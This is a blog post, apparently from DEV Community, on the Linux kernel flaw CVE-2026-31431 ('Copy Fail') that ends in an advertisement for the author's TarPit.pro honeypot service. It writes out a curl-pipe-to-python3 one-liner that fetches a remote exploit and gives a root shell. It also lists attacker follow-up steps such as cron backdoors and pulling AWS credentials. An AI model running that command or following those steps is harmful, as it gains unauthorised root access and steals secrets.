DEV Community

Christopher Karatzinis
Christopher Karatzinis

Posted on

Copy Fail is 732 bytes. Your foothold problem is the bigger one.

#security #devops #linux #sysadmin

CVE-2026-31431 dropped this week. The disclosure site is at copy.fail and the writeup is short enough to read with coffee.

The TL;DR: a logic flaw in the kernel's authencesn path, reachable through AF_ALG sockets, abused via splice() to land a 4-byte write into the page cache of any setuid binary. They picked /usr/bin/su for the demo. The whole exploit is 732 bytes of Python 3 standard library. No race window. No kernel offsets. Reliable across every affected distro from 2017 onward.

Quick run:

$ curl https://copy.fail/exp | python3 && su
#
Enter fullscreen mode Exit fullscreen mode

Root shell. The kernel hands it over because AF_ALG is on by default and authencesn does the wrong thing under splice().

The bit nobody is talking about

Copy Fail is a local privilege escalation. The attacker still needs an unprivileged shell on your box to fire it.

That shell doesn't come from your hardened SSH. It comes from the WordPress plugin you forgot was installed. The Grafana on :3000. The Jenkins your CI team spun up two years ago. The leaked GitHub PAT in a public gist. The n-day on your firewall vendor that everyone is still patching.

They land as www-data. They run the 732-byte one-liner. They're root. Backdoor in /etc/cron.d/. known_hosts dumped. AWS keys pulled from ~/.aws/credentials. Your Ansible inventory is now their target list. Friday they're inside. Sunday they push. Monday your /home is on a leak site and you're explaining to legal why prod creds lived on a Jenkins worker.

What we actually see

I run TarPit.pro. It's a honeypot that answers on the ports your real services listen on, hands attackers a believable banner, then tarpits and bans them. Across 5 boxes in the last 20 days:

  • ~40,000 attack attempts
  • ~14,000 unique source IPs
  • ~5,000 IPs auto banned
  • Top ports hit: SSH (14k), Telnet (3.2k), SMB (2.2k)
  • Top sources: US, China, UK, Hong Kong, Netherlands

That's the foothold market. Those are the IPs that, in another month, will be the ones running curl copy.fail/exp | python3 on whichever box they land on first.

Patch the kernel. Of course. Then drown them at the door.

You're going to patch. Distros are already shipping fixes. The next CVE is already being written though, and the foothold pipeline doesn't care which kernel you're running.

A honeypot doesn't replace patching. It buys you the one thing you can't get anywhere else: the brute forcer wastes their session on a fake SSH that never lets them in, gets banned across your fleet on the first connection and never reaches the box where Copy Fail or whatever comes next would have actually mattered.

Try it free: https://tarpit.pro

Single Go binary, systemd, fake banners on 70+ services, fleet wide bans across your servers. Free tier covers up to 2 servers with the cloud dashboard. Coupon LAUNCH101 gives 2 months free on Starter or Pro.

Top comments (0)